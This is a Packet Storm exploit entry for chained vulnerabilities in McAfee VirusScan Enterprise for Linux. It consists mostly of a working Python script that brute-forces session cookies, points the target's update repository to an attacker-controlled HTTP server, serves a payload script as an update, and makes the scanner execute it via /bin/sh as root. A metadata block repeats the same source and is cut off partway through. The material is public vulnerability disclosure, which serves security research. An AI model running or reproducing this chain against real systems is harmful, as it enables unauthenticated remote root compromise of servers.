McAfee Virus Scan Enterprise For Linux Remote Code Execution
2016-12-14T00:00:00
ID PACKETSTORM:140147 Type packetstorm Reporter Andrew Fasano Modified 2016-12-14T00:00:00
Description
`Source: https://nation.state.actor/mcafee.html
Vulnerabilities
CVE-2016-8016: Remote Unauthenticated File Existence Test
CVE-2016-8017: Remote Unauthenticated File Read (with Constraints)
CVE-2016-8018: No Cross-Site Request Forgery Tokens
CVE-2016-8019: Cross Site Scripting
CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation
CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location
CVE-2016-8022: Remote Use of Authentication Tokens
CVE-2016-8023: Brute Force Authentication Tokens
CVE-2016-8024: HTTP Response Splitting
CVE-2016-8025: Authenticated SQL Injection
When chained together, these vulnerabilities allow a remote attacker to execute code as root.
'''
#!/bin/python3
import time
import requests
import os
import sys
import re
import threading
import subprocess
from http.server import BaseHTTPRequestHandler, HTTPServer
from socketserver import ThreadingMixIn
# Per-target configuration
# All of these are module-level globals read directly by the functions below;
# nothing is taken from the command line (sys is imported but never used).
target_domain="https://10.0.1.130" # https://target_ip
local_ip = '10.0.1.128' # Attacker IP for victim to connect back to
# Embedded twice into the forged nailsSessionId value in crack_cookie(); the
# session cookie carries the client address it is valid for (see
# CVE-2016-8022 in the list above).
authorized_ip="127.0.0.1" # IP address cookie will be valid for
update_server_port = 8080 # Port update server listens on
# NOTE: delay_seconds is never referenced anywhere in this listing.
delay_seconds = 10 # How long should the server take to serve the update
target_port = 55443 # Port to target
# Put payload script in payload.sh
# Initialization
# Set by the fake update server once /catalog.z has been served; the main
# script blocks on it with payload_in_place.wait().
payload_in_place = threading.Event()
# Silences urllib3's InsecureRequestWarning, which every verify=False request
# below would otherwise print; certificate validation of the target is off.
requests.packages.urllib3.disable_warnings()
# payload.sh is read once at import time; a missing file raises
# FileNotFoundError here, before any request is made.
with open("payload.sh", "r") as f:
    payload = f.read()
def pprint(inp, flag=False):
    """Print a status line: a blank line, then '# ' (or '* ' when flag is truthy) and inp."""
    marker = "*" if flag else "#"
    print(" ".join(("\n" + marker, inp)))
def crack_cookie():
    """Guess the timestamp inside a nailsSessionId cookie by trial requests.

    The cookie format is ``<authorized_ip>/n/0/<timestamp>-checksum// <authorized_ip>``
    padded with spaces.  Starting at the current time plus 100 seconds, one GET
    of an authenticated page is sent per candidate timestamp, counting down one
    second at a time.  The response is treated as "accepted" as soon as it
    carries a Set-Cookie header (CVE-2016-8023 on this page).

    Returns:
        The first cookie string the server accepted.

    Raises:
        requests.HTTPError: from raise_for_status() on any non-2xx reply.

    Note:
        The loop has no lower bound or request limit: if no candidate is ever
        accepted it runs indefinitely.  From the server's side every probe is
        a separate request to the same URL carrying a sequentially decreasing
        cookie value, which is the observable pattern of this routine.
    """
    pprint("Cracking Cookie")
    # A page that requires authentication
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html"
    # Start at the current time + 100 in case of recent login with clock skew
    date_val = int(time.time()+100)
    cookie_fmt = authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20
    # Make requests, print after every 600
    while True:
        cookie = cookie_fmt % date_val
        req_cookie = {"nailsSessionId": cookie}
        r = requests.get(url, cookies=req_cookie, verify=False)
        r.raise_for_status()
        # Presence of Set-Cookie is the only acceptance oracle used.
        if "Set-Cookie" in r.headers:
            valid_cookie = cookie
            # split("/")[3] is the "<timestamp>-checksum" field of the format above.
            timestamp = cookie.split("/")[3].split("-")[0]
            break
        elif date_val % 600 == 0:
            print("Now trying %s" % time.asctime(time.localtime(date_val)))
        date_val -= 1
    pprint("Cookie Cracked: " + timestamp, True)
    return valid_cookie
def update_update_server(auth_cookie):
    """Point the target's update repository at local_ip:update_server_port.

    A single GET to the ``repository.html`` proxy page carries three commands
    in the query string: ``mon:0`` runs ``db set 1 _table=repository`` with a
    replacement ``siteList`` XML document, ``mon:1`` runs ``task setsitelist``
    to apply it, and ``mon:2`` reads the repository table back.  The XML is
    double URL-encoded (``%253C`` -> ``%3C`` -> ``<``); it keeps the stock
    ``McAfeeFtp`` fallback site and replaces the ``McAfeeHttp`` repository
    server with ``local_ip:update_server_port`` over plain HTTP with
    ``UseAuth`` set to 0.  Combined with the missing update-signature check
    (CVE-2016-8021 above) this makes the target fetch updates from the host
    started by start_update_server().

    Args:
        auth_cookie: dict passed to requests as ``cookies``; must hold an
            accepted ``nailsSessionId`` (see crack_cookie()).

    Raises:
        requests.HTTPError: from raise_for_status() on any non-2xx reply.
    """
    pprint("Updating update server")
    # Replace McAfeeHttp update server with attacker local_ip:update_server_port
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \
        "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \
        "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \
        "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \
        "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \
        "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \
        "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \
        "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \
        + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \
        "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \
        "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \
        "eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \
        "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \
        "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \
        "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \
        "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \
        "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \
        "posProperty=fallback&useOfProxy=on"
    # The whole state change is carried in a GET query string (no CSRF token
    # is required; CVE-2016-8018 above).
    r = requests.get(url, cookies=auth_cookie, verify=False)
    r.raise_for_status()
    pprint("Updated update server", True)
def download_update(req_cookie):
    """Create and start an Update task so the target contacts its repository.

    One form-encoded POST to ``/0409/nails`` adds a row to the ``schedule``
    table (``taskName=update_<epoch>``, ``taskType=Update``,
    ``toUpdate=dat;engine``, unscheduled) via ``mon:0``, starts it at once
    with ``mon:1=task nstart <name>``, and appends the page's usual
    listing/``updatecrontab`` commands.  With the repository changed by
    update_update_server(), the update client fetches from the fake server.

    Args:
        req_cookie: dict passed to requests as ``cookies``; must hold an
            accepted ``nailsSessionId``.

    Raises:
        requests.HTTPError: from raise_for_status() on any non-2xx reply.
    """
    pprint("Requesting target download payload")
    # Send request to make target download payload
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    # Task name is unique per second; {0} below is replaced twice.
    updateName = "update_%d" % int(time.time())
    # The trailing """ on the last line is one closing quote plus an empty
    # string literal that is implicitly concatenated; it changes nothing.
    postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \
        "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \
        "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \
        "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \
        "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \
        "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \
        "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \
        "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \
        "Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    pprint("Payload download requested", 1)
def exec_catalogz(req_cookie):
    """Make the target run the fetched catalog.z through /bin/sh as a "scan".

    Two requests are sent with ``req_cookie``:

    1. A GET of the ``schedOnDemand.html`` proxy page whose ``info:0`` asks
       for ``multi,show,digest``; the ``|digest=...|`` value in the response
       text is extracted by regex and used as ``commit_id`` for the sconf
       transaction in step 2.
    2. A POST to ``/0409/nails`` that begins an ``sconf`` transaction on
       profile ``ODS_name`` (``ODS_1``), sets a full on-demand profile in which
       ``scannerPath`` is ``binary_path`` (``/bin/sh``) and ``enginePath`` is
       ``payload_path`` (presumably where the update task stored the
       ``catalog.z`` served by the fake repository — not verifiable from this
       listing), commits it, adds an On-Demand schedule row ``scan_name``
       using that profile, and starts it with ``task nstart``.

    This is the ``scannerPath`` issue listed above as CVE-2016-8020.

    Args:
        req_cookie: dict passed to requests as ``cookies``.

    Returns:
        ``False`` when no ``digest`` is found in the first response, otherwise
        ``None``.  The caller in this script ignores the return value.

    Raises:
        requests.HTTPError: from raise_for_status() on any non-2xx reply.
    """
    pprint("Making target execute payload")
    #### Get commit_id and ODS_name
    url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \
        ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \
        "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \
        "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \
        ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \
        "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction"
    r = requests.get(url, cookies=req_cookie, verify=False)
    r.raise_for_status()
    # Non-raw pattern: "\|" is not a Python escape, so the backslash survives
    # and re sees a literal pipe (newer interpreters warn about the escape).
    regex = re.search("\|digest=(.+?)\|", r.text)
    if not regex:
        print("\nERROR: Could not get commit_id when generating evil scan\n")
        return False
    # groups(1) is groups(default=1); [0] is the single capture group.
    commit_id = regex.groups(1)[0]
    # Send request to start evil scan
    payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z"
    binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x
    url = target_domain + ":" + str(target_port) + "/0409/nails"
    ODS_name = "ODS_1" # This may need to be increased if the name already exists
    scan_name = "scan_%s" % str(int(time.time()))
    # Placeholders: {0}=commit_id {1}=ODS_name {2}=scan_name {3}=payload_path {4}=binary_path
    postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \
        "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \
        "ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \
        "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \
        ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \
        "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \
        "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \
        "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \
        "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \
        "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \
        "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \
        "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \
        "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \
        "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \
        "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \
        "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \
        "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \
        ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \
        "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \
        "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \
        ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \
        "on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \
        "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \
        "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \
        "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \
        "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \
        "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \
        "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \
        "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \
        "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \
        "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path)
    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
    r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)
    r.raise_for_status()
    # Only reports that the request was accepted, not that anything ran.
    pprint("Payload executed", 1)
def start_update_server():
    """Start a background HTTP server that stands in for the McAfee update repository.

    The server binds ``local_ip``:``update_server_port`` over plain HTTP and
    runs ``serve_forever`` on a separate, non-daemon thread.  ``do_GET``
    distinguishes two cases: ``/catalog.z`` is answered with the contents of
    ``payload`` (read from payload.sh at import time), then ``payload_in_place``
    is set and ``KillServer`` is raised so the connection is torn down and the
    server shuts itself down; any other path gets a small SiteStatus XML whose
    ``CatalogVersion`` is "2" followed by the current epoch seconds, so every
    reply advertises a newer catalog than the one before.

    Returns:
        The running ``BackgroundHTTPSrv``; the caller stops it with ``shutdown()``.
    """
    class RequestHandler(BaseHTTPRequestHandler):
        # ``s`` is the handler instance (what would conventionally be ``self``).
        def do_HEAD(s):
            s.send_response(200)
            s.send_header("Content-type", "text/html")
            s.end_headers()
        def do_GET(s):
            if s.path == "/catalog.z":
                s.send_response(200)
                s.send_header("Content-type", "text/html")
                s.end_headers()
                # ``payload`` is the module-level string read from payload.sh.
                s.wfile.write(bytes(payload, "utf-8"))
                pprint("Payload placed", 1)
                # Wakes the main script, which blocks in payload_in_place.wait().
                payload_in_place.set()
                # Die after sending payload so we send an incomplete response
                # The body has already been written at this point; what is
                # skipped is the handler's normal completion.  KillServer is
                # defined later in the enclosing function and is looked up from
                # that scope when do_GET runs, not when this class is created.
                raise KillServer
            else: # Assume all other requests are for SiteStat - Always increasing version
                s.send_response(200)
                s.send_header("Content-type", "text/xml")
                s.end_headers()
                # "%d" is filled with int(time.time()), giving CatalogVersion="2<epoch>".
                s.wfile.write(bytes(("""<?xml version="1.0" encoding="UTF-8"?>""" \
                    """<SiteStatus Status="Enabled" CatalogVersion="2%d">""" \
                    """ </SiteStatus>""") % int(time.time()), "utf-8"))
    # Throwing KillServer will shutdown the server ungracefully
    class KillServer(Exception):
        def __str__(self):
            return "Kill Server (not an error)"
    # ThreadingMixIn plus support for KillServer exceptions
    class AbortableThreadingMixIn(ThreadingMixIn):
        # Overrides the stdlib per-connection thread body so that KillServer,
        # raised from the handler, stops the whole server instead of being
        # reported as a handler error.
        def process_request_thread(self, request, client_address):
            try:
                self.finish_request(request, client_address)
                self.shutdown_request(request)
            except KillServer:
                pprint("Killing update server dirtily")
                self.shutdown_request(request)
                # Runs on the connection thread while serve_forever runs on the
                # thread started below, so shutdown() can wait for it safely.
                self.shutdown() # Only if we want to shutdown
            except:
                # Bare except: also catches SystemExit/KeyboardInterrupt on
                # this thread; handle_error reports the traceback and the
                # connection is closed.
                self.handle_error(request, client_address)
                self.shutdown_request(request)
    class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):
        pass
    pprint("Launching update server")
    srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)
    # Non-daemon thread: the interpreter does not exit until serve_forever
    # returns, i.e. until shutdown() has been called.
    threading.Thread(target=srv.serve_forever).start()
    pprint("Update server started", 1)
    return srv
####################################################################################
####################################################################################
# Module-level driver: runs on import (no ``if __name__ == "__main__"`` guard),
# chaining the steps above in order.  Every step raises on a non-2xx reply
# via raise_for_status(), which aborts the script at that point.
pprint("Attacking %s" % target_domain, 1)
# Crack the auth cookie
# Unbounded loop: returns only once the target accepts a guessed cookie.
cookie = crack_cookie()
auth_cookie = {"nailsSessionId": cookie}
# Start our update server locally
srv = start_update_server()
# Force target to use our update server
update_update_server(auth_cookie)
# Make target download an update from us
download_update(auth_cookie)
# Block until the target downloads our payload,
# No timeout: if the target never requests /catalog.z this blocks forever and,
# because the server thread is non-daemon, the process cannot exit on its own.
payload_in_place.wait()
# Shutdown our update server
# The handler already called shutdown() when it raised KillServer; this second
# call presumably returns at once because the serve_forever loop has exited.
srv.shutdown()
# Execute /bin/sh -(?) catalog.z
# exec_catalogz() returns False when the digest lookup fails; that result is
# not checked here.
exec_catalogz(auth_cookie)
`
{"id": "PACKETSTORM:140147", "published": "2016-12-14T00:00:00", "references": [], "type": "packetstorm", "enchantments": {"score": {"value": 7.7, "vector": "NONE", "modified": "2016-12-14T02:03:47"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310106470"]}, {"type": "nessus", "idList": ["MCAFEE_VSEL_SB10181.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:40911"]}, {"type": "zdt", "idList": ["1337DAY-ID-26519"]}, {"type": "cert", "idList": ["VU:245327"]}, {"type": "cve", "idList": ["CVE-2016-8017", "CVE-2016-8018", "CVE-2016-8016", "CVE-2016-8025", "CVE-2016-8023", "CVE-2016-8024", "CVE-2016-8020", "CVE-2016-8021", "CVE-2016-8019", "CVE-2016-8022"]}, {"type": "saint", "idList": ["SAINT:9BB81EFD042AB3DA9DDEDA9585D54BE2", "SAINT:3F45369261059DA84B497885AF5B9BCB"]}], "modified": "2016-12-14T02:03:47"}, "vulnersScore": 7.7}, "cvelist": ["CVE-2016-8019", "CVE-2016-8024", "CVE-2016-8018", "CVE-2016-8020", "CVE-2016-8023", "CVE-2016-8016", "CVE-2016-8025", "CVE-2016-8021", "CVE-2016-8017", "CVE-2016-8022"], "sourceData": "`Source: https://nation.state.actor/mcafee.html \n \nVulnerabilities \n \nCVE-2016-8016: Remote Unauthenticated File Existence Test \nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints) \nCVE-2016-8018: No Cross-Site Request Forgery Tokens \nCVE-2016-8019: Cross Site Scripting \nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation \nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location \nCVE-2016-8022: Remote Use of Authentication Tokens \nCVE-2016-8023: Brute Force Authentication Tokens \nCVE-2016-8024: HTTP Response Splitting \nCVE-2016-8025: Authenticated SQL Injection \nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root. 
\n''' \n#!/bin/python3 \nimport time \nimport requests \nimport os \nimport sys \nimport re \nimport threading \nimport subprocess \nfrom http.server import BaseHTTPRequestHandler, HTTPServer \nfrom socketserver import ThreadingMixIn \n \n# Per-target configuration \ntarget_domain=\"https://10.0.1.130\" # https://target_ip \nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to \nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for \nupdate_server_port = 8080 # Port update server listens on \ndelay_seconds = 10 # How long should the server take to serve the update \ntarget_port = 55443 # Port to target \n \n# Put payload script in payload.sh \n \n# Initialization \npayload_in_place = threading.Event() \nrequests.packages.urllib3.disable_warnings() \nwith open(\"payload.sh\", \"r\") as f: \npayload = f.read() \n \ndef pprint(inp, flag=False): \npad = \"#\" \nif flag: \npad = \"*\" \nprint(\"\\n\" + pad+ \" \" + inp) \n \n \ndef crack_cookie(): \npprint(\"Cracking Cookie\") \n \n# A page that requires authentication \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\" \n \n# Start at the current time + 100 in case of recent login with clock skew \ndate_val = int(time.time()+100) \ncookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20 \n \n# Make requests, print after every 600 \nwhile True: \ncookie = cookie_fmt % date_val \nreq_cookie = {\"nailsSessionId\": cookie} \nr = requests.get(url, cookies=req_cookie, verify=False) \nr.raise_for_status() \n \nif \"Set-Cookie\" in r.headers: \nvalid_cookie = cookie \ntimestamp = cookie.split(\"/\")[3].split(\"-\")[0] \nbreak \n \nelif date_val % 600 == 0: \nprint(\"Now trying %s\" % time.asctime(time.localtime(date_val))) \n \ndate_val -= 1 \n \npprint(\"Cookie Cracked: \" + timestamp, True) \nreturn valid_cookie \n \n \ndef update_update_server(auth_cookie): \npprint(\"Updating update server\") \n \n# Replace McAfeeHttp update 
server with attacker local_ip:update_server_port \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\ \n\"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\ \n\"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\ \n\"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\ \n\"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\ \n\"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\ \n\"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\ \n\"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\ \n+ \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\ \n\"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\ \n\"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\ \n\"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\ \n\"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\ \n\"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\ \n\"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\ \n\"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\ \n\"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\ \n\"posProperty=fallback&useOfProxy=on\" \n \nr = 
requests.get(url, cookies=auth_cookie, verify=False) \nr.raise_for_status() \npprint(\"Updated update server\", True) \n \ndef download_update(req_cookie): \npprint(\"Requesting target download payload\") \n \n# Send request to make target download payload \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails\" \n \nupdateName = \"update_%d\" % int(time.time()) \npostdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\ \n\"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\ \n\"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\ \n\"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\ \n\"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\ \n\"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\ \n\"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\ \n\"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\ \n\"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName) \n \nheaders = {'Content-Type': 'application/x-www-form-urlencoded'} \nr = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) \nr.raise_for_status() \n \npprint(\"Payload download requested\", 1) \n \n \ndef exec_catalogz(req_cookie): \npprint(\"Making target execute payload\") \n \n#### Get commit_id and ODS_name \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\ \n\".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\ 
\n\"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\ \n\"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\ \n\",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\ \n\"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\" \n \nr = requests.get(url, cookies=req_cookie, verify=False) \nr.raise_for_status() \n \nregex = re.search(\"\\|digest=(.+?)\\|\", r.text) \nif not regex: \nprint(\"\\nERROR: Could not get commit_id when generating evil scan\\n\") \nreturn False \n \ncommit_id = regex.groups(1)[0] \n \n# Send request to start evil scan \npayload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\" \nbinary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x \n \nurl = target_domain + \":\" + str(target_port) + \"/0409/nails\" \n \nODS_name = \"ODS_1\" # This may need to be increased if the name already exists \nscan_name = \"scan_%s\" % str(int(time.time())) \n 